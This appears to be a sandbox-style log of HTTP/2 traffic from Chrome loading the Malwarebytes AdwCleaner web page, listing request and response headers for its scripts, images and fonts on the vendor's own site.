                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 324
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:28 GMT
                                                                                                                                                                      etag: "7da0728d310d91:0"
                                                                                                                                                                      last-modified: Wed, 14 Dec 2022 21:32:22 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 64B6p1w0riftSSEJ-eek3XEWYMFlyMeHuoh3Rdf-nbSKNhOALenVog==
                                                                                                                                                                      age: 334
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/user-experience/tooltip/popper.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/user-experience/tooltip/popper.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      last-modified: Wed, 02 Nov 2022 00:33:56 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:28 GMT
                                                                                                                                                                      etag: W/"db23bfca52eed81:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: GvrToTPnmQO-OK2bOBqcNxdZ7TVnBeNq5FfRQDeB7T7LlwkNc3YjiQ==
                                                                                                                                                                      age: 334
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/global-phone.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/global-phone.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"e724c9e2eebd91:0"
                                                                                                                                                                      last-modified: Fri, 09 Dec 2022 16:54:21 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: ZZBNCqak177CCIOlEe2OSpCEpvC969kYvHRaAuO4N5Y34yxoChVuSg==
                                                                                                                                                                      age: 339
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/partners/optimus-systems.webp
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/partners/optimus-systems.webp HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 437
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: "801b64ed394fd71:0"
                                                                                                                                                                      last-modified: Sat, 22 May 2021 18:40:24 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: D0DZ7nTvYYiEzZvw2DJLJwZINwFEq7oZg2d4wehh8ysa0i0-gWxNdQ==
                                                                                                                                                                      age: 339
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/footer.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/footer.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/webp
                                                                                                                                                                      content-length: 1832
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      last-modified: Wed, 21 Apr 2021 02:05:43 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: "78bd4d65236d71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: RefreshHit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 0f0kNpkQ5c8cPcGnhtdbdjwfWR9MmYqk1RWSVIiBmXYTD8wWy_uPQg==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/component-project/templates/navwrap/masterpage-svg.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/component-project/templates/navwrap/masterpage-svg.svg HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: same-origin
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"47965 - 638071651000000000"
                                                                                                                                                                      last-modified: Tue, 20 Dec 2022 20:31:40 G12T
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: ig9-_3mL7FUJ5bal2s_1G-bXuqtt0mIuKUCnVxles4rGvXjsVt9hiQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/website-refresh/adwcleaner/adwcleaner_hero_image.jpg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/website-refresh/adwcleaner/adwcleaner_hero_image.jpg HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/jpeg
                                                                                                                                                                      content-length: 92219
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: "608b78da7c36d71:0"
                                                                                                                                                                      last-modified: Wed, 21 Apr 2021 07:06:29 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 44Z0vIR8glzelNOBn5rxzqp0QFQMmQPUwN4HPue_umPhumHHYMHSwg==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/rsa2021.jpg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/rsa2021.jpg HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:20:45 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"ce1a6e727dd71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: RefreshHit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: xIAuLmiC-xj5x-ZVfI7hss97_XGJZa4zeAfkWlTitkxYXCEiKk3ZcA==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/website-refresh/adwcleaner/removes_adware_img.webp
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/website-refresh/adwcleaner/removes_adware_img.webp HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:21:31 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      etag: W/"2d511589727dd71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: KbEQvALljjx-3MlGWB29ENLUkndFT6WsQ36QBv7JpIu87D3IYX44Xg==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-regular.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts/graphik-regular.otf HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/jpeg
                                                                                                                                                                      content-length: 28006
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      last-modified: Wed, 21 Apr 2021 00:19:18 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: "9c6452f84336d71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: RefreshHit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: GtmCvQfWlXGBTJnL638TO6g1aHurCX2xKKiWEbp5oaLrcoaYTE78EQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-medium.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts/graphik-medium.otf HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/html
                                                                                                                                                                      content-length: 890
                                                                                                                                                                      cache-control: private
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: CxMuLNMmNLzSYQjM4JsukPWPKxuc5Bc4zSPOgb4R-uBD2LtLI8FoDA==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-semibold.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts/graphik-semibold.otf HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/webp
                                                                                                                                                                      content-length: 6182
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      last-modified: Wed, 21 Apr 2021 07:07:29 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: "4825a5fd7c36d71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: RefreshHit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: zy27JMmSuIEjqlINm9cqMK0Mxx232XCkBw7k2zbYcJWVwmrsFugQ2w==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-bold.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts/graphik-bold.otf HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
